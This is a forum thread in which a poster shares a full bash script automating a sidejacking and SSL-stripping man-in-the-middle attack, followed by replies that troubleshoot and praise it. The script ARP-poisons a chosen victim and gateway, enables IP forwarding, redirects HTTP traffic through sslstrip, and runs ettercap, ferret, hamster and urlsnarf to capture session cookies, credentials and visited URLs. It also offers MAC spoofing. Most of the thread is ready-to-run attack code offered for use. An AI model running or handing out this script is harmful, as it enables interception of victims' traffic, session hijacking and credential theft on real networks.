Another script for sidejacking..
I know there are other scripts out there that do the same thing but, here is one I made. Perhaps someone else will find it useful. It basically uses hamster, ferret, sslstrip, ettercap, urlsnarf, and arpspoof, although adding your favourite program shouldn't be too difficult.
I tested it in Backtrack 4 R2. One thing to note is the paths of ferret and hamster are hardcoded because it seems there is a problem with just executing them as is. At least on my R2 installation. You can customize it to suit your own needs, like the xterm window sizes and a few other things.
Code is here:
Gorara - sidejackssl.sh
And here:
Code:
#!/bin/bash
# sidejackssl.sh v0.1
# tested in backtrack 4 R2 environment, run as root.
# xterm used for window control
# arpspoof poisons a single victim and gateway
# ferret and hamster for sidejacking
# sslstrip for https
# ettercap for everything else
# urlsnarf to monitor visited urls
# firefox needs to be configured with a proxy of 127.0.0.1:1234
# url for hamster server is http://hamster
# by gorara
# a few variables (do not change)
m1="0" # missing file var m1
m2="0" # missing file var m2
m3="0" # missing file var m3
m4="0" # missing file var m4
quickclean="0" # used for quick clean up
randmac="n" # default setting do not randomize MAC
hamsterfile="hamster.txt" # hamster output file (you can't change it)
trap 'cleanup' SIGINT SIGTERM # detect control-c
# a few more variables (change these if required)
# xterm window variables
x="0" # x offset value
y="0" # y offset value
width="120" # width value
height="7" # height value
yoffset="120" # y offset
fgcolor="white" # foreground color
bgcolor="black" # background color
# style variables
warnstyle="[\e[01;38mw\e[00m]" # warning msgs style
execstyle="[\e[01;32mx\e[00m]" # execute msgs style
infostyle="[\e[01;34mi\e[00m]" # informational msgs style
inputstyle="[\e[01;30m?\e[00m]" # input msgs style
# file variables
sslstripfile="sslstrip.log" # sslstrip output file name
snifffile="sniff-*" # hamster sniff file wildcard
etterfile="etter.cap" # ettercap output cap file
temp="/tmp" # temporary dir
function usage
{
clear
echo "Usage: bash $0 -i interface -t target -g gateway [-r] [-h]"
echo ""
echo " -i interface interface to use, ex. eth0, wlan0."
echo " -t target the target IP address."
echo " -g gateway the gateway IP address."
echo " -r randomize your MAC address,"
echo " only use for wired interfaces."
echo " -h display this help screen."
echo ""
echo " examples: "
echo " bash $0 -i eth0 -t 192.168.0.1 -g 192.168.0.254 -r"
echo " bash $0 -i wlan0 -t 192.168.0.1 -g 192.168.0.254"
echo ""
exit 0
}
function cleanup() {
echo -e "\n$warnstyle control-c pressed! "
# exit script if nothing has been modified
if [[ "$quickclean" = "1" ]]; then
echo -e "$infostyle nothing changed, all done!"
exit 0
fi
echo -e "$infostyle cleaning up..."
echo -e "$execstyle flushing iptables..."
iptables -F
iptables -t nat -F
echo -e "$execstyle turning off IP forwarding..."
echo "0" > /proc/sys/net/ipv4/ip_forward
# change back MAC address to orignal one
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle resetting MAC address...";
echo -e "$infostyle original MAC is: $origmac"
ifconfig $interface down
ifconfig $interface hw ether $origmac
ifconfig $interface up
if [ -z $gw ]; then
echo -e "$warnstyle WARNING, you have no default gateway!"
else
route add default gw $gw
fi
rm $temp/mac.orig
rm $temp/gw.orig
fi
echo -e "$execstyle cleaning up files..."
echo -e "$infostyle temp directory: "
# testing to see if files exist, if so display them...
if [ -f $temp/$sslstripfile ]; then
ls $temp/$sslstripfile
else
#echo -e "$warnstyle missing $sslstripfile"
m1="1"
fi
if [ -f $temp/$etterfile ]; then
ls $temp/$etterfile
else
#echo -e "$warnstyle missing $etterfile"
m2="1"
fi
echo -e "$infostyle current directory: "
if [ -f $snifffile ]; then
ls $snifffile
else
#echo -e "$warnstyle missing $snifffile"
m3="1"
fi
if [ -f $hamsterfile ]; then
ls $hamsterfile
else
#echo -e "$warnstyle missing $hamsterfile"
m4="1"
fi
# testing to see if there are any files at all
if [[ $m1 -eq 0 || $m2 -eq 0 || $m3 -eq 0 || $m4 -eq 0 ]]; then
while [[ "$delete" != "y" || "$delete" != "n" ]]
echo -en "$infostyle delete file(s)? [y/n]: "
read delete
do
case "$delete" in
y) delete_marker="y"; echo -e "$warnstyle deleting files!"; break;;
n) echo -e "$warnstyle nothing deleted!"; break;;
*) echo -e "$warnstyle wrong selection!";
esac
done
# delete files as requested
if [[ "$delete_marker" = "y" ]]; then
if [ -f $temp/$sslstripfile ]; then
rm $temp/$sslstripfile
fi
if [ -f $temp/$etterfile ]; then
rm $temp/$etterfile
fi
if [ -f $snifffile ]; then
rm $snifffile
fi
if [ -f $hamsterfile ]; then
rm $hamsterfile
fi
fi
else
echo -e "$warnstyle nothing to delete!"
fi
echo -e "$infostyle all done!"
exit 0
}
# start main program
if [ "$#" -eq 0 ]; then
usage
fi
while [ "$#" -gt 0 ]
do
case "$1" in
-i) interface=$2; shift 1;;
-r) randmac="y"; shift 1;;
-t) target=$2; shift 1;;
-g) gateway=$2; shift 1;;
-h) usage;;
-*) usage; break;;
*) break;;
esac
shift
done
# required parameters
if [[ -z $interface || -z $target || -z $gateway ]]; then
usage
exit 0
fi
clear
if [[ "$randmac" = "y" ]]; then
mac="yes"
else
mac="no"
fi
# set quick cleanup flag
quickclean="1"
echo -e "$infostyle sidejacker/sslstrip script v0.1, by gorara"
echo -e "$infostyle ctrl-c to abort at any time."
echo -e "$infostyle attack summary:"
echo -e "$infostyle host $target and gateway $gateway from $interface, spoof MAC: $mac"
if [[ "$randmac" = "y" ]]; then
echo -e "$execstyle change of $interface MAC address requested."
if [[ "$interface" = wlan* || "$interface" = wifi* || "$interface" = ath* ]]; then
echo -e "$infostyle wireless device detected..."
echo -e "$warnstyle can't change MAC address without taking wifi interface down"
echo -e "$warnstyle do it manually before connecting to the AP."
exit 0
fi
if [[ "$interface" = eth* ]]; then
echo -e "$infostyle wired device detected..."
echo -e "$warnstyle WARNING, this will take your wired interface down temporarily."
echo -en "$inputstyle do you want to continue? [y/n]: "
read continue
if [[ "$continue" = "y" ]]; then
echo -e "$infostyle proceeding..."
else
echo -e "$infostyle exiting..."
exit 0
fi
fi
origmac=`ifconfig $interface | grep HWaddr | awk {'print $5'}`
fi
# before this, ctrl-c will exit script without doing anything.
quickclean="0"
# use macchanger to randomize MAC address, ect.
if [[ "$randmac" = "y" || "$randmac" = "Y" ]]; then
echo -e "$execstyle randomizing MAC address...";
gw=`route -n | grep UG | awk {'print $2'}` > $temp/gw.orig
ifconfig $interface down
macchanger -r $interface > $temp/mac.orig
ifconfig $interface up
if [ -z $gw ]; then
echo -e "$warnstyle WARNING, you have no default gateway!"
else
route add default gw $gw
fi
origmac=`cat $temp/mac.orig | grep Current | awk {'print $3'}`
fakemac=`cat $temp/mac.orig | grep Faked | awk {'print $3'}`
echo -e "$infostyle original MAC is: $origmac"
echo -e "$infostyle faked MAC is: $fakemac"
fi
echo -e "$execstyle turning on IP Forwarding..."
echo "1" > /proc/sys/net/ipv4/ip_forward
echo -e "$execstyle configuring iptables..."
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 10000
sleep 1
echo -e "$execstyle starting hamster ... <logging to: $hamsterfile>"
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "hamster" -e /pentest/sniffers/hamster/hamster &
sleep 2
echo -e "$execstyle starting ferret ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ferret" -e /pentest/sniffers/hamster/ferret -i $interface &
sleep 2
echo -e "$execstyle starting sslstrip ... <logging to: $temp/$sslstripfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "sslstrip" -e sslstrip -w $temp/$sslstripfile &
sleep 2
echo -e "$execstyle starting ettercap ... <logging to: $temp/$etterfile>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "ettercap" -e ettercap -Tqpi $interface -w $temp/$etterfile /$gateway/ /$target/ &
sleep 2
echo -e "$execstyle starting urlsnarf ... <logging to: console>"
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "urlsnarf" -e urlsnarf -i $interface &
sleep 2
echo -e "$infostyle trap is ready, now to direct traffic..."
echo -e "$execstyle ARP poisoning the target..."
y=$(($y+$yoffset))
xterm -geometry "$width"x$height+$x+$y -bg $bgcolor -fg $fgcolor -T "arpspoof" -e arpspoof -i $interface -t $target $gateway &
sleep 1
echo -e "$infostyle run firefox and type http://hamster"
echo -e "$infostyle don't forget to set proxy to 127.0.0.1:1234"
echo -e "$infostyle press ctrl-c to exit and clean up... \n"
for ((;;)) do
read loop
echo -en "$infostyle press ctrl-c to terminate!"
done
exit 0
Re: Another script for sidejacking..
Very slick. Will test tonight and provide feedback. You should start a google code page to track changes.
Riferimento: Another script for sidejacking..
its not working , i use r2 but i get eror when run it
sh sidejacking.sh
Re: Riferimento: Another script for sidejacking..
Quote:
Originally Posted by
Xploit
its not working , i use r2 but i get eror when run it
sh sidejacking.sh
And we are just suppose to know what happened if you don't give us the error message ?
Re: Riferimento: Another script for sidejacking..
Quote:
Originally Posted by
Xploit
its not working , i use r2 but i get eror when run it
sh sidejacking.sh
I am going to take a guess
you need to
chmod +x sidejacking.sh
(you need to make the script executable)
Re: Riferimento: Another script for sidejacking..
Quote:
Originally Posted by
spudgunman
I am going to take a guess
you need to
chmod +x sidejacking.sh
(you need to make the script executable)
Actually, thats not really required, simply copy-paste code into file, save as sidejackssl.sh (or whatever you want), and run as such:
Code:
bash sidejackssl.sh
It requires parameters, which the script will show you if you run it like this. You can change it to make it executable and run as ./sidejackssl.sh if you wish.
Re: Another script for sidejacking..
Quote:
root@bt:~# bash sidejackssl.sh
: command not founde 2:
: command not founde 14:
: command not founde 24:
: command not founde 26:
: command not founde 35:
: command not founde 41:
: command not founde 47:
'idejackssl.sh: line 49: syntax error near unexpected token `{
'idejackssl.sh: line 49: `{
Im attempting too run this on BT4-R2. I get this error doing it both "bash sidejackssl.sh" and "./sidejackssl.sh"
just reporting, im sorry if the answer is simple and beyond my grasp.
Re: Another script for sidejacking..
Quote:
Originally Posted by
fromthestars
Im attempting too run this on BT4-R2. I get this error doing it both "bash sidejackssl.sh" and "./sidejackssl.sh"
just reporting, im sorry if the answer is simple and beyond my grasp.
It looks like you may have copy-pasted the code from pastebin, if so you may have copied the line numbers too. Try pressing the RAW option in pastebin and copy the raw text, or copy the code from the initial post.
Riferimento: Another script for sidejacking..
: command not founde 2:
: command not founde 14:
: command not founde 24:
: command not founde 26:
: command not founde 35:
: command not founde 41:
: command not founde 47:
'idejackssl.sh: line 49: syntax error near unexpected token `{
'idejackssl.sh: line 49: `{
Re: Another script for sidejacking..
Absolutely brilliant. It works like a bomb. I just need to test the BackTrack Linux - Penetration Testing Distribution proxy but rest of the stuff in the meantime.
Excellent work
